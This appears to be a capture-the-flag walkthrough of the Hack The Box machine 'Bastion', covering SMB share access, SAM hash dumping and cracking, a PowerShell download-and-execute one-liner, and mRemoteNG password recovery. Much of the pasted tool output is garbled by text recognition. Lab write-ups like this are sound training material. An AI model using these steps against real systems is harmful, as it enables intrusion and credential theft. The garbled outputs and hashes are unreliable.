Bastion – 10.10.10.134

Nmap scan:

Nmap 7.70 scan initiated sun Apr 28 10:49:12 2019 as: nmap Nmap scan report for 10.10.10.134 Host is up (0.041s latency). Not shown: 996 closed ports -A -ON nmap.txt 10.10.10.134 PORT STATE SERVICE 22/ t cp open ssh I ssh-hostkey: VERSION OpenSSH for_Windows 7.9 (protocol 2.0) 204B (RSA) 256 (ECDSA) 256 (E025519) 135/tcp open msrpc Microsoft windows RPC 139/tcp open netbios-ssn Microsoft windows netbios-ssn 445/tcp open microsoft-ds windows server 2016 standard 14393 microsoft-ds NO exact OS matches for host (If you know What OS is running on it, see https://nmap.org/submft/ TCP/IP fingerprint: OS pc - 1 inux OS 8 STI 1 '.06-m540ST11 E c OS : N ( ) Tl ( OS : ) IE
Network Distance: 2 hops Service Info: OSS : Windows, Windows Server 2008 R2 - 2012; Host script results: CPE: cpe: rosoft :windows clock-skew: mean: .48m55s, smb-os-discovery: os: windows server 2016 Computer name: Bastion deviation: lhe9m13s, median: •8m58s standard 14393 (windows server 2016 standard 6.3) NetBios computer name: BASTION\xOO Workgroup: WORKGROUP\x€o system time: smb •security mode: account used: guest authentication level: user challenge response: supported message_signing: disabled (dangerous, but default) smb2-security-mode: 2.02: Message signing enabled but not required smb2- time: date: 2019-94-28 start date: TRACEROUTE (using port 3389/tcp) HOP NTT ADDRESS 4€.98 ms 10.10.14.1 2 41 .65 ms 10.10.10.134 OS and Service detection performed. N•nap done at Sun Apr 28 Please report any incorrect results at https://nmap.org/submit/ 2019 (I host up) scanned in 63.23 seconds

Since it’s a windows PC, it Seems best to start taking a look on it on a windows pc too.

Install Openvpn on Windows and import the conf file from HTB

Connect and now we can see the Bastion Box

Microsoft Windows (Version (c) 2018 Microsoft Corporation. All rights reserved. 10.10.1ø.13,1 Pinging 10.10.1e.134 with 32 bytes of data: Reply from 10.10.10.134: bytes=32 time=65ms Reply fron 10.1e.1e.134: bytes=32 time=34ms Reply from 134: bytes:32 time=32ms Reply fron 10.134: bytesz32 time=33ms ping statistics for Packets: Sent 4, Received 4, Lost TTL-127 TTL=127 TTL-127 ø (OX loss), roximate round trip times in milli-seconds: Minimum = 32ms, maximum 65ms, Average = alms

Connect through file explorer to find shares

, 10.1Φ10.134

Found backups

Here are 2 vhd files in, let’s look through them with 7zip

> 101010.134 Backups > WindowsimageBackup L4mpje-pc > Backup 2019-02-22 124351 Name 9b9cfbc3-369e-I I e9-aI Date modified 2/22/2019 1:44 PM 2/22/2019 1:45 PM Type VHD File VHD File Size 3606 KB

The second one is the greatest and we can see it’s an windows directory.

Got a SAM file… got SYSTEM FILE

Using samdump2 to extract what’s needed:

Machine generated alternative text: sarndump2 SYSTEM SAM Administrator : 500 : aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7eoc€89co: : : Guest: 501: aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7eoc089co: : : L4mpje: 1000 : aad3b435b51404eeaad3b435b51404ee : 26112010952d963c8dc4217daec986d9: : :

Crack the hash

Machine generated alternative text: john - -show - -format—LM L4m Pje.hash L4mpje: : 1000 : aad3b435b51404eeaad3b435b51404ee : 26112010952d963c8dc4217daec98 6d9::.
john • •show • •tormat=nt L4mpje.hash L4mpj e : bureau tampje: leee : aad3b43sb51404eeaad3b435b51404ee : 26112010952d963c8dc4217daec986d9: : oassword hash cracked. O left

Okay we got the password, let’s ssh our way in!

Microsoft windows (version 10.0.143931 (c) 2016 microsoft Corporation. rights reserved
14mpje@BASTION Desktop 14mpje@BASTION volume in drive c has no label. volume serial Number is ecB3-c487 Di rectory 22-02-2019 22-02-2919 23• 02 •2919 Of 16:27 16:27 10:07 1 File(s) 32 user.txt 32 bytes 2 Dir(s) 11.299.796.032 bytes free 14mpje@8AST10N user. txt gbfe57d5c3309db3a151772f9d86c6cd

9bfe57d5c3309db3a151772f9d86c6cd

ONTO ROOT:

Time to run some scripts now for enumeration

PowerUp.ps1

Jaws-enum.ps1

How to run

Tried downloading it from own apache2 server –> not work

Tried downloading it from github with curl -> not work

Tried running it passed by with powershell

powershell -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.14/PowerUp.ps1’);Invoke-AllChecks”

Check

In search for the odd looking program

We find an application installed in the Programs (x86) folder called mRemoteNG

http://hackersvanguard.com/mremoteng-insecure-password-storage/

Looking for the passwords

14mpje@BAST10N C: 'Is' is not recognized as an internal or external command, operable program or batch file. 14mpje@BASTION volume in drive C has no label. volume serial Number is ocB3-C487 22-02-2019 22-02-2019 03-05-2019 19 : 58 03-05-2019 19:58 22-02-2019 15:03 22-02-2019 15:02 22-02-2019 22-02-2019 22-02 14 15:01 e File(s) Local Local Low Roaming e bytes 3 Dir(s) 11.294.584.832 bytes free t4mpje@BASTION C: Volume in drive C has no label. volume serial Number is øcB3-C487 15:01 15:01 14:50 19:58 e File(s) Adobe mRemoteNG e bytes 4 Dir(s) 11.294.580.730 bytes tree 14mpj 14mpje@BASTION C: Volume in drive C has no label. Volume Seriat Number is OCB3.C487 eorR> 6.316 confcons.xml 6. 194 confCons . 20190222- 14022773F

FOUND

Let’s try method 2 to crack password

Method 2: Using an Offline Decoder A modified version of the Metasploit module Ruby code, can be used to get the clear text passwords from within a protected connections file. me file can be downloaded from packetstorm (https://packetstormsecurity.com/files/126309 /mRemoteOffPwdsDecrypt. rb_txt) and run on Kali systems as such: ruby mRemoteOfiPwdsDecrypt.rb confCons.xml

Didn’t work, exploit too old. Not applyable for this version.

Let’s try method 1 then…

So downloaded mRemoteNG from the website

https://mremoteng.org/download

Installed it on local windows computer and ran it.

After that I took the consConf.xml file and replaced by the one of the box.

Adapted the “protected” value to the “blank hash” and ran it again.

With the trick showed in the URL got the password of admin account.

[https://pastebin.com/auZQVFuQ ** if the file from the box doesn’t work, take this one, the syntax errors are fixed.]

With the pass we can ssh into the machine

Ssh into admin account

administrator@BASTION Volume in drive C has no label. 25-04-2019 06:08 06 : eB 23-02-2019 10:40 23-02-2019 10:40 23-02-2019 10:40 23-02-2019 10:40 23-02-2019 10:40 23-02-2019 23-02-2019 10:40 23-62-2019 23-62-2019 10 : 40 23-62-2019 23-02-2019 10:40 Volume Serial 25 -64-2019 10 Number is øcB3-C487 : 40 e File(s) contacts Desktop Documents Down loads Favorites Links Music Pictures Saved Games Searches videos e bytes 13 Dir(s) 11.297.513.472 bytes tree administrator@BASTION Desktop Volume in drive C has no label. Volume Serial Number is øCB3-C487 23-02-2019 23-02-2019 23-02-2019 10: 40 10:40 10:07 32 root. txt 1 File(s) 32 bytes 2 Dir(s) 11.297.513.472 bytes free administrator@BASTION txt Invalid parameter - /root.txt administrator@BASTION 95885øb91811676ed0620a9c43øe65cB root. txt

GOT ROOT